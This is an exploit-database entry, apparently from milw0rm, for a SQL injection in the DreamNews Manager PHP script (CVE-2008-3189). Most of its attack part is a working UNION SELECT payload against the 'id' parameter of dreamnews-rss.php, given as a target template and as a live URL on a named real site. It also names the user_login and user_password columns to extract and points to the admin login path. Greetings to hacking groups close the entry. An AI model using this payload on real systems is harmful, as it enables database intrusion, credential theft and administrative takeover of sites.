DreamNews Manager - 'id' SQL Injection

Author: Hussin X
type: webapps
platform: php
port: 
date_added: 2008-07-09 
date_updated: 2016-12-13 
verified: 1 
codes: OSVDB-46906;CVE-2008-3189 
tags: 
aliases:  
screenshot_url:  
application_url: 

#########################################################
#
#     dreamnews ( rss) Remote SQL Injection Vulnerability
#========================================================
#    Author: Hussin X                                   =
#                                                       =
#    Home :  www.tryag.cc/cc                            =
#                                                       =
#    email:  darkangel_g85[at]Yahoo[DoT]com             =
#                                                       =
#=========================================================
#
#    script :  http://dreamlevels.com/dreamnews.php
#
#    DorK   :  N/A
#
##########################################################

Exploit:

www.[target].com/Script/dreamnews-rss.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--


L!VE DEMO:

http://dreamlevels.com/demo/dreamnews/dreamnews-rss.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--


column_name :

user_password
user_login



Admin Login :

/admin/

########################( Greetz )###########################
#                                                           #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke    #
#                                                           #
#         Iraqihack / FAHD / mos_chori / Silic0n            #
#                                                           #
#############################################################

                       Im IRAQi

# milw0rm.com [2008-07-10]